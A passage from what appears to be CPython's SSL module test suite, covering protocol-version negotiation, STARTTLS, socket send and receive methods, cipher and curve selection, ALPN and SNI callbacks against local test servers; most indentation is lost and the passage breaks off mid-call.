"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
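# `wrapped` tracks whether the connection is currently TLS-wrapped;
# the client only switches modes after the server acknowledges a
# STARTTLS/ENDTLS command with "OK".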
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(TimeoutError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on an SSLSocket created through
# SSLContext.wrap_socket().
client_ctx, server_ctx, hostname = testing_context()
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = server_ctx.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client waits until the server is set up, then performs a connect.
evt.wait()
client = client_ctx.wrap_socket(
socket.socket(), server_hostname=hostname
)
client.connect((hostname, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.3')
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
client_context, server_context, hostname = testing_context()
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
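# TLS 1.3 cipher suite names only encode the AEAD and hash (key
# exchange and authentication are negotiated separately), hence the
# small fixed set accepted below.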
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_tls_version('TLSv1_1')
@ignore_deprecation
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_tls_version('TLSv1_2')
@requires_tls_version('TLSv1')
@ignore_deprecation
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
seclevel_workaround(client_context, server_context)
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
client_context, server_context, hostname = testing_context()
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
with self.assertRaises(ssl.SSLError):
server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
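# A minimal client-side sketch (not part of the test suite) of the ALPN API the
# tests above exercise; the host name and protocol list are placeholder
# assumptions, not values used elsewhere in this file.
def _alpn_client_sketch(host='example.org', port=443):
    import socket
    import ssl
    ctx = ssl.create_default_context()
    ctx.set_alpn_protocols(['h2', 'http/1.1'])  # client offer, in preference order
    with socket.create_connection((host, port)) as raw_sock:
        with ctx.wrap_socket(raw_sock, server_hostname=host) as tls_sock:
            # None when the server did not negotiate ALPN, else the selected protocol
            return tls_sock.selected_alpn_protocol()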
def test_npn_protocols(self):
assert not ssl.HAS_NPN
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
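# Minimal sketch (outside the tests) of the server-side SNI pattern that
# servername_cb above demonstrates: swap in a per-hostname context during the
# handshake. The hostname-to-context mapping is a placeholder assumption.
def _sni_dispatch_sketch(default_context, contexts_by_name):
    def pick_context(ssl_sock, server_name, initial_context):
        ctx = contexts_by_name.get(server_name)
        if ctx is not None:
            ssl_sock.context = ctx  # certificate/key for the requested name
        # returning None lets the handshake continue with the current context
    default_context.set_servername_callback(pick_context)
    return default_context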
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason,
'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# first connection without session
stats = server_params_test(client_context, server_context,
